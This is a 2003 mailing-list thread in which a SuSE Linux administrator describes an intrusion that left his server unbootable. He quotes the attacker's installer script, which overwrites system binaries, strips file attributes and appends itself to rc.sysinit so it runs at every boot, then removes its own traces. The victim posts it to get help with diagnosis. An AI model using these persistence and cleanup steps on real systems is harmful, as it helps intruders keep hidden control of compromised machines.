I am a little puzzled about this attack. To take sendmail, in my system - 8.0 - the permissions and ownership for sendmail are:

-r-xr-sr-x 1 root mail

As I understand matters, to overwrite sendmail as configured above requires root access, and the directory in which it is kept ( /sbin ) is only root writeable. How can a process gain root access unless it exploits a process or program that runs under root? Was someone able to telnet or ssh in and then switch user to root? Perhaps the experts can enlighten us.

Basil Fowler

On Friday 13 Jun 2003 14:18, Peter Gloor wrote:
Unfortunately I left SuSE Linux 8.0 Professional Server open tonight. SuSE Firewall 2 was temporarily deactivated.
At 2 PM somebody from outside managed to implant a virus (dir /mihai and files like /.mihai, /mihai.tgz, /mihai/inst etc.). At the same time /etc/rc.d/rc.sysinit was overwritten (with a call to wrapper) and the files /usr/bin/wrapper as well as /usr/sbin/wrapper have been overwritten with the code of /mihai.
I'm not sure, but it looks like other files have been affected as well (sendmail has tonight's date and is much larger than the original sendmail).
Before I rebooted the server I removed /usr/bin/wrapper and /usr/sbin/wrapper.
Now, the server will no longer boot. After mounting the file systems (reiserfs) the following message appears:

mounting local filesystems proc on /proctyp proc (rw)
Then the server hangs. How can I get the server up again?
It doesn't matter to me if I have to reinstall all software, as long as I don't need to destroy my partitions and, more importantly, the file system on hda3, since I have a backup of all important config files and all data files on hda3.
I tried to reinstall from CD, but this doesn't work either (options freely translated from German):
- New Install: Will create new partitions and overwrite my HD!?!
- Update existing system: Does not boot (same as normal boot from disk)
- Start installed system: Does not boot (same as normal boot from disk)
What can I do? Any hints are welcome.
This is what /mihai/inst looks like:
---------------------------------------------------------------
#/bin/bash
echo "Start Daemon"
sleep 1
./kill
cp -f mihai /usr/bin/wrapper
cp -f mihai /usr/sbin/wrapper
sleep 1
wrapper
chattr -AacdisSu /etc/rc.d/rc.sysinit
echo >>/etc/rc.d/rc.sysinit "#Start Wrapper"
echo >>/etc/rc.d/rc.sysinit wrapper
sleep 1
rm -rf mihai.tgz
rm -rf mihai
echo "Done"
---------------------------------------------------------------
Does anybody know this virus?
Peter